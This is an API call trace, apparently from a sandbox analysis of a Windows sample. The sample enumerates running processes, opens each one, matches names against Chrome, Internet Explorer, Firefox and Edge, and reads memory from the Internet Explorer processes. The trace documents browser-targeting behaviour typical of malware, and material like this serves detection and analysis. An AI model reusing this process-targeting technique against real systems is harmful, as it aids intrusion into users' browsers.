	[0249.127] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.127] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0249.128] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x9e10
	[0249.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.128] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0249.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.128] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.129] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0249.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.129] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.129] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0249.130] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x9e14
	[0249.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.130] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0249.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.130] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.131] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0249.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.131] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.131] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0249.132] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x9e18
	[0249.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.132] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0249.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.132] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.133] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0249.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.133] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.133] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0249.134] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x9e1c
	[0249.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.135] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0249.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.135] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.135] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0249.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.136] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.136] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0249.136] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0249.137] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0249.137] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x9e20
	[0249.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.137] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0249.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.138] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.139] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0249.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.139] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.140] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0249.140] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x9e24
	[0249.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.140] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0249.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.141] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.141] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0249.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.141] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.142] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0249.142] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x9e28
	[0249.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.142] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0249.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.143] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.143] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0249.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.143] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.144] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0249.144] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x9e2c
	[0249.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.145] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0249.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.145] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.145] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0249.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.146] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.146] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0249.147] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x9e30
	[0249.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.147] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0249.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.147] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.148] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0249.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.149] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.149] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0249.150] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x9e34
	[0249.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.150] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0249.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.150] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.151] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0249.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.151] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.151] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0249.152] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x9e38
	[0249.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.152] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0249.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.153] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.153] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0249.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.153] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.154] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0249.154] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x9e3c
	[0249.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.155] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0249.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.155] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.156] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0249.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.156] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.156] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0249.157] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x9e40
	[0249.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.157] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0249.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.157] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.158] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0249.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.158] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.158] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0249.159] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x9e44
	[0249.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.159] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0249.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.160] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.160] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0249.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.160] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.160] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0249.161] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x9e48
	[0249.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.161] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0249.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.162] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.162] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0249.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.163] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.163] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0249.164] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x9e4c
	[0249.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.164] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0249.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.165] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.166] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0249.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.166] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.167] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0249.167] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x9e50
	[0249.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.168] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0249.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.168] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.169] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0249.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.169] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.169] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0249.207] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x9e54
	[0249.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.208] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0249.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.208] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.209] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0249.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.209] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.210] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0249.211] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x9e58
	[0249.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.211] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0249.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.212] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.212] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0249.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.213] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.213] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0249.214] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x9e5c
	[0249.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.214] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0249.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.215] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0249.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.215] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0249.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.215] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.215] NtQueryInformationProcess (in: ProcessHandle=0x9e5c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0249.216] ReadProcessMemory (in: hProcess=0x9e5c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0249.216] ReadProcessMemory (in: hProcess=0x9e5c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0249.216] ReadProcessMemory (in: hProcess=0x9e5c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0249.216] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0249.216] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0249.217] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x9e60
	[0249.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.217] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0249.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.217] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0249.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.217] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0249.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.218] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.218] NtQueryInformationProcess (in: ProcessHandle=0x9e60, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0249.218] ReadProcessMemory (in: hProcess=0x9e60, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0249.218] ReadProcessMemory (in: hProcess=0x9e60, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0249.218] ReadProcessMemory (in: hProcess=0x9e60, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0249.218] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0249.218] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0249.219] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x9e64
	[0249.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.219] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0249.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.220] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.220] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0249.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.220] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
